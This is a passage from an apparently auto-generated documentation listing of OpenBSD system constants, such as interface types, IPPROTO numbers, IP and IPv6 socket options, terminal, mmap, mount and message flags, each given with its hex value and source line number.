IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 685) | IFT_IFGSN = 0x91 constant IFT_IMT (line 686) | IFT_IMT = 0xbe constant IFT_INFINIBAND (line 687) | IFT_INFINIBAND = 0xc7 constant IFT_INTERLEAVE (line 688) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 689) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 690) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 691) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 692) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 693) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 694) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 695) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 696) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 697) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS (line 698) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 699) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 700) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 701) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 702) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 703) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 704) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 705) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 706) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 707) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 708) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 709) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 710) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 711) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 712) | IFT_LAPB = 0x10 constant IFT_LAPD (line 713) | IFT_LAPD = 0x4d constant IFT_LAPF (line 714) | IFT_LAPF = 0x77 constant IFT_LINEGROUP (line 715) | IFT_LINEGROUP = 0xd2 constant IFT_LOCALTALK (line 716) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 717) | IFT_LOOP = 0x18 constant IFT_MBIM (line 718) | IFT_MBIM = 0xfa constant IFT_MEDIAMAILOVERIP (line 719) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 720) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 721) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 722) | IFT_MODEM = 0x30 constant IFT_MPC (line 723) | IFT_MPC = 0x71 constant IFT_MPLS (line 724) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 725) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 726) | IFT_MSDSL = 0x8f constant IFT_MVL (line 727) | IFT_MVL = 0xbf constant IFT_MYRINET (line 728) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 729) | IFT_NFAS = 0xaf constant IFT_NSIP (line 730) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 731) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 732) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 733) | IFT_OTHER = 0x1 constant IFT_P10 (line 734) | IFT_P10 = 0xc constant IFT_P80 (line 735) | IFT_P80 = 0xd constant IFT_PARA (line 736) | IFT_PARA = 0x22 constant IFT_PFLOG (line 737) | IFT_PFLOG = 0xf5 constant IFT_PFLOW (line 738) | IFT_PFLOW = 0xf9 constant IFT_PFSYNC (line 739) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 740) | IFT_PLC = 0xae constant IFT_PON155 (line 741) | IFT_PON155 = 0xcf constant IFT_PON622 (line 742) | IFT_PON622 = 0xd0 constant IFT_POS (line 743) | IFT_POS = 0xab constant IFT_PPP (line 744) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 745) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPATM (line 746) | IFT_PROPATM = 0xc5 constant IFT_PROPBWAP2MP (line 747) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 748) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 749) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 750) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 751) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 752) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 753) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 754) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 755) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 756) | IFT_PVC = 0xf2 constant IFT_Q2931 (line 757) | IFT_Q2931 = 0xc9 constant IFT_QLLC (line 758) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 759) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 760) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 761) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 762) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 763) | IFT_RS232 = 0x21 constant IFT_RSRB (line 764) | IFT_RSRB = 0x4f constant IFT_SDLC (line 765) | IFT_SDLC = 0x11 constant IFT_SDSL (line 766) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 767) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 768) | IFT_SIP = 0x1f constant IFT_SIPSIG (line 769) | IFT_SIPSIG = 0xcc constant IFT_SIPTG (line 770) | IFT_SIPTG = 0xcb constant IFT_SLIP (line 771) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 772) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 773) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 774) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 775) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 776) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 777) | IFT_SONETVT = 0x33 constant IFT_SRP (line 778) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 779) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 780) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 781) | IFT_STARLAN = 0xb constant IFT_T1 (line 782) | IFT_T1 = 0x12 constant IFT_TDLC (line 783) | IFT_TDLC = 0x74 constant IFT_TELINK (line 784) | IFT_TELINK = 0xc8 constant IFT_TERMPAD (line 785) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 786) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 787) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 788) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 789) | IFT_ULTRA = 0x1d constant IFT_USB (line 790) | IFT_USB = 0xa0 constant IFT_V11 (line 791) | IFT_V11 = 0x40 constant IFT_V35 (line 792) | IFT_V35 = 0x2d constant IFT_V36 (line 793) | IFT_V36 = 0x41 constant IFT_V37 (line 794) | IFT_V37 = 0x78 constant IFT_VDSL (line 795) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 796) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VIRTUALTG (line 797) | IFT_VIRTUALTG = 0xca constant IFT_VOICEDID (line 798) | IFT_VOICEDID = 0xd5 constant IFT_VOICEEM (line 799) | IFT_VOICEEM = 0x64 constant IFT_VOICEEMFGD (line 800) | IFT_VOICEEMFGD = 0xd3 constant IFT_VOICEENCAP (line 801) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFGDEANA (line 802) | IFT_VOICEFGDEANA = 0xd4 constant IFT_VOICEFXO (line 803) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 804) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 805) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERCABLE (line 806) | IFT_VOICEOVERCABLE = 0xc6 constant IFT_VOICEOVERFRAMERELAY (line 807) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 808) | IFT_VOICEOVERIP = 0x68 constant IFT_WIREGUARD (line 809) | IFT_WIREGUARD = 0xfb constant IFT_X213 (line 810) | IFT_X213 = 0x5d constant IFT_X25 (line 811) | IFT_X25 = 0x5 constant IFT_X25DDN (line 812) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 813) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 814) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 815) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 816) | IFT_XETHER = 0x1a constant IGNBRK (line 817) | IGNBRK = 0x1 constant IGNCR (line 818) | IGNCR = 0x80 constant IGNPAR (line 819) | IGNPAR = 0x4 constant IMAXBEL (line 820) | IMAXBEL = 0x2000 constant INLCR (line 821) | INLCR = 0x40 constant INPCK (line 822) | INPCK = 0x10 constant IN_CLASSA_HOST (line 823) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 824) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 825) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 826) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 827) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 828) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 829) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 830) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 831) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 832) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 833) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 834) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 835) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 836) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 837) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_HOST (line 838) | IN_RFC3021_HOST = 0x1 constant IN_RFC3021_NET (line 839) | IN_RFC3021_NET = 0xfffffffe constant IN_RFC3021_NSHIFT (line 840) | IN_RFC3021_NSHIFT = 0x1f constant IPPROTO_AH (line 841) | IPPROTO_AH = 0x33 constant IPPROTO_CARP (line 842) | IPPROTO_CARP = 0x70 constant IPPROTO_DIVERT (line 843) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 844) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 845) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 846) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 847) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 848) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 849) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 850) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 851) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 852) | IPPROTO_GGP = 0x3 constant IPPROTO_GRE (line 853) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 854) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 855) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 856) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 857) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 858) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 859) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 860) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPIP (line 861) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV4 (line 862) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 863) | IPPROTO_IPV6 = 0x29 constant IPPROTO_MAX (line 864) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 865) | IPPROTO_MAXID = 0x103 constant IPPROTO_MOBILE (line 866) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 867) | IPPROTO_MPLS = 0x89 constant IPPROTO_NONE (line 868) | IPPROTO_NONE = 0x3b constant IPPROTO_PFSYNC (line 869) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PIM (line 870) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 871) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 872) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 873) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 874) | IPPROTO_RSVP = 0x2e constant IPPROTO_SCTP (line 875) | IPPROTO_SCTP = 0x84 constant IPPROTO_TCP (line 876) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 877) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 878) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 879) | IPPROTO_UDPLITE = 0x88 constant IPV6_AUTH_LEVEL (line 880) | IPV6_AUTH_LEVEL = 0x35 constant IPV6_AUTOFLOWLABEL (line 881) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_CHECKSUM (line 882) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 883) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 884) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 885) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 886) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 887) | IPV6_DSTOPTS = 0x32 constant IPV6_ESP_NETWORK_LEVEL (line 888) | IPV6_ESP_NETWORK_LEVEL = 0x37 constant IPV6_ESP_TRANS_LEVEL (line 889) | IPV6_ESP_TRANS_LEVEL = 0x36 constant IPV6_FAITH (line 890) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 891) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 892) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FRAGTTL (line 893) | IPV6_FRAGTTL = 0x78 constant IPV6_HLIMDEC (line 894) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 895) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 896) | IPV6_HOPOPTS = 0x31 constant IPV6_IPCOMP_LEVEL (line 897) | IPV6_IPCOMP_LEVEL = 0x3c constant IPV6_JOIN_GROUP (line 898) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 899) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 900) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 901) | IPV6_MAXPACKET = 0xffff constant IPV6_MINHOPCOUNT (line 902) | IPV6_MINHOPCOUNT = 0x41 constant IPV6_MMTU (line 903) | IPV6_MMTU = 0x500 constant IPV6_MULTICAST_HOPS (line 904) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 905) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 906) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 907) | IPV6_NEXTHOP = 0x30 constant IPV6_OPTIONS (line 908) | IPV6_OPTIONS = 0x1 constant IPV6_PATHMTU (line 909) | IPV6_PATHMTU = 0x2c constant IPV6_PIPEX (line 910) | IPV6_PIPEX = 0x3f constant IPV6_PKTINFO (line 911) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 912) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 913) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 914) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 915) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_RECVDSTOPTS (line 916) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVDSTPORT (line 917) | IPV6_RECVDSTPORT = 0x40 constant IPV6_RECVHOPLIMIT (line 918) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 919) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 920) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 921) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 922) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 923) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTABLE (line 924) | IPV6_RTABLE = 0x1021 constant IPV6_RTHDR (line 925) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 926) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 927) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 928) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 929) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 930) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 931) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 932) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 933) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 934) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 935) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 936) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 937) | IP_ADD_MEMBERSHIP = 0xc constant IP_AUTH_LEVEL (line 938) | IP_AUTH_LEVEL = 0x14 constant IP_DEFAULT_MULTICAST_LOOP (line 939) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 940) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 941) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 942) | IP_DROP_MEMBERSHIP = 0xd constant IP_ESP_NETWORK_LEVEL (line 943) | IP_ESP_NETWORK_LEVEL = 0x16 constant IP_ESP_TRANS_LEVEL (line 944) | IP_ESP_TRANS_LEVEL = 0x15 constant IP_HDRINCL (line 945) | IP_HDRINCL = 0x2 constant IP_IPCOMP_LEVEL (line 946) | IP_IPCOMP_LEVEL = 0x1d constant IP_IPDEFTTL (line 947) | IP_IPDEFTTL = 0x25 constant IP_IPSECFLOWINFO (line 948) | IP_IPSECFLOWINFO = 0x24 constant IP_IPSEC_LOCAL_AUTH (line 949) | IP_IPSEC_LOCAL_AUTH = 0x1b constant IP_IPSEC_LOCAL_CRED (line 950) | IP_IPSEC_LOCAL_CRED = 0x19 constant IP_IPSEC_LOCAL_ID (line 951) | IP_IPSEC_LOCAL_ID = 0x17 constant IP_IPSEC_REMOTE_AUTH (line 952) | IP_IPSEC_REMOTE_AUTH = 0x1c constant IP_IPSEC_REMOTE_CRED (line 953) | IP_IPSEC_REMOTE_CRED = 0x1a constant IP_IPSEC_REMOTE_ID (line 954) | IP_IPSEC_REMOTE_ID = 0x18 constant IP_MAXPACKET (line 955) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 956) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MF (line 957) | IP_MF = 0x2000 constant IP_MINTTL (line 958) | IP_MINTTL = 0x20 constant IP_MIN_MEMBERSHIPS (line 959) | IP_MIN_MEMBERSHIPS = 0xf constant IP_MSS (line 960) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 961) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 962) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 963) | IP_MULTICAST_TTL = 0xa constant IP_OFFMASK (line 964) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 965) | IP_OPTIONS = 0x1 constant IP_PIPEX (line 966) | IP_PIPEX = 0x22 constant IP_PORTRANGE (line 967) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 968) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 969) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 970) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 971) | IP_RECVDSTADDR = 0x7 constant IP_RECVDSTPORT (line 972) | IP_RECVDSTPORT = 0x21 constant IP_RECVIF (line 973) | IP_RECVIF = 0x1e constant IP_RECVOPTS (line 974) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 975) | IP_RECVRETOPTS = 0x6 constant IP_RECVRTABLE (line 976) | IP_RECVRTABLE = 0x23 constant IP_RECVTTL (line 977) | IP_RECVTTL = 0x1f constant IP_RETOPTS (line 978) | IP_RETOPTS = 0x8 constant IP_RF (line 979) | IP_RF = 0x8000 constant IP_RTABLE (line 980) | IP_RTABLE = 0x1021 constant IP_SENDSRCADDR (line 981) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 982) | IP_TOS = 0x3 constant IP_TTL (line 983) | IP_TTL = 0x4 constant ISIG (line 984) | ISIG = 0x80 constant ISTRIP (line 985) | ISTRIP = 0x20 constant ITIMER_PROF (line 986) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 987) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 988) | ITIMER_VIRTUAL = 0x1 constant IUCLC (line 989) | IUCLC = 0x1000 constant IXANY (line 990) | IXANY = 0x800 constant IXOFF (line 991) | IXOFF = 0x400 constant IXON (line 992) | IXON = 0x200 constant KERN_HOSTNAME (line 993) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 994) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 995) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 996) | KERN_VERSION = 0x4 constant LCNT_OVERLOAD_FLUSH (line 997) | LCNT_OVERLOAD_FLUSH = 0x6 constant LOCK_EX (line 998) | LOCK_EX = 0x2 constant LOCK_NB (line 999) | LOCK_NB = 0x4 constant LOCK_SH (line 1000) | LOCK_SH = 0x1 constant LOCK_UN (line 1001) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 1002) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1003) | MADV_FREE = 0x6 constant MADV_NORMAL (line 1004) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 1005) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1006) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 1007) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 1008) | MADV_WILLNEED = 0x3 constant MAP_ANON (line 1009) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1010) | MAP_ANONYMOUS = 0x1000 constant MAP_CONCEAL (line 1011) | MAP_CONCEAL = 0x8000 constant MAP_COPY (line 1012) | MAP_COPY = 0x2 constant MAP_FILE (line 1013) | MAP_FILE = 0x0 constant MAP_FIXED (line 1014) | MAP_FIXED = 0x10 constant MAP_FLAGMASK (line 1015) | MAP_FLAGMASK = 0xfff7 constant MAP_HASSEMAPHORE (line 1016) | MAP_HASSEMAPHORE = 0x0 constant MAP_INHERIT (line 1017) | MAP_INHERIT = 0x0 constant MAP_INHERIT_COPY (line 1018) | MAP_INHERIT_COPY = 0x1 constant MAP_INHERIT_NONE (line 1019) | MAP_INHERIT_NONE = 0x2 constant MAP_INHERIT_SHARE (line 1020) | MAP_INHERIT_SHARE = 0x0 constant MAP_INHERIT_ZERO (line 1021) | MAP_INHERIT_ZERO = 0x3 constant MAP_NOEXTEND (line 1022) | MAP_NOEXTEND = 0x0 constant MAP_NORESERVE (line 1023) | MAP_NORESERVE = 0x0 constant MAP_PRIVATE (line 1024) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 1025) | MAP_RENAME = 0x0 constant MAP_SHARED (line 1026) | MAP_SHARED = 0x1 constant MAP_STACK (line 1027) | MAP_STACK = 0x4000 constant MAP_TRYFIXED (line 1028) | MAP_TRYFIXED = 0x0 constant MCL_CURRENT (line 1029) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1030) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 1031) | MNT_ASYNC = 0x40 constant MNT_DEFEXPORTED (line 1032) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1033) | MNT_DELEXPORT = 0x20000 constant MNT_DOOMED (line 1034) | MNT_DOOMED = 0x8000000 constant MNT_EXPORTANON (line 1035) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1036) | MNT_EXPORTED = 0x100 constant MNT_EXRDONLY (line 1037) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 1038) | MNT_FORCE = 0x80000 constant MNT_LAZY (line 1039) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1040) | MNT_LOCAL = 0x1000 constant MNT_NOATIME (line 1041) | MNT_NOATIME = 0x8000 constant MNT_NODEV (line 1042) | MNT_NODEV = 0x10 constant MNT_NOEXEC (line 1043) | MNT_NOEXEC = 0x4 constant MNT_NOPERM (line 1044) | MNT_NOPERM = 0x20 constant MNT_NOSUID (line 1045) | MNT_NOSUID = 0x8 constant MNT_NOWAIT (line 1046) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1047) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1048) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1049) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1050) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 1051) | MNT_SOFTDEP = 0x4000000 constant MNT_STALLED (line 1052) | MNT_STALLED = 0x100000 constant MNT_SWAPPABLE (line 1053) | MNT_SWAPPABLE = 0x200000 constant MNT_SYNCHRONOUS (line 1054) | MNT_SYNCHRONOUS = 0x2 constant MNT_UPDATE (line 1055) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1056) | MNT_VISFLAGMASK = 0x400ffff constant MNT_WAIT (line 1057) | MNT_WAIT = 0x1 constant MNT_WANTRDWR (line 1058) | MNT_WANTRDWR = 0x2000000 constant MNT_WXALLOWED (line 1059) | MNT_WXALLOWED = 0x800 constant MOUNT_AFS (line 1060) | MOUNT_AFS = "afs" constant MOUNT_CD9660 (line 1061) | MOUNT_CD9660 = "cd9660" constant MOUNT_EXT2FS (line 1062) | MOUNT_EXT2FS = "ext2fs" constant MOUNT_FFS (line 1063) | MOUNT_FFS = "ffs" constant MOUNT_FUSEFS (line 1064) | MOUNT_FUSEFS = "fuse" constant MOUNT_MFS (line 1065) | MOUNT_MFS = "mfs" constant MOUNT_MSDOS (line 1066) | MOUNT_MSDOS = "msdos" constant MOUNT_NCPFS (line 1067) | MOUNT_NCPFS = "ncpfs" constant MOUNT_NFS (line 1068) | MOUNT_NFS = "nfs" constant MOUNT_NTFS (line 1069) | MOUNT_NTFS = "ntfs" constant MOUNT_TMPFS (line 1070) | MOUNT_TMPFS = "tmpfs" constant MOUNT_UDF (line 1071) | MOUNT_UDF = "udf" constant MOUNT_UFS (line 1072) | MOUNT_UFS = "ffs" constant MSG_BCAST (line 1073) | MSG_BCAST = 0x100 constant MSG_CMSG_CLOEXEC (line 1074) | MSG_CMSG_CLOEXEC = 0x800 constant MSG_CTRUNC (line 1075) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1076) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1077) | MSG_DONTWAIT = 0x80 constant MSG_EOR (line 1078) | MSG_EOR = 0x8 constant MSG_MCAST (line 1079) | MSG_MCAST = 0x200 constant MSG_NOSIGNAL (line 1080) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1081) | MSG_OOB = 0x1 constant MSG_PEEK (line 1082) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1083) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1084) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 1085) | MSG_WAITFORONE = 0x1000 constant MS_ASYNC (line 1086) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1087) | MS_INVALIDATE = 0x4 constant MS_SYNC (line 1088) | MS_SYNC = 0x2 constant NAME_MAX (line 1089) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1090) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1091) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1092) | NET_RT_IFLIST = 0x3 constant NET_RT_IFNAMES (line 1093) | NET_RT_IFNAMES = 0x6 constant NET_RT_MAXID (line 1094) | NET_RT_MAXID = 0x8 constant 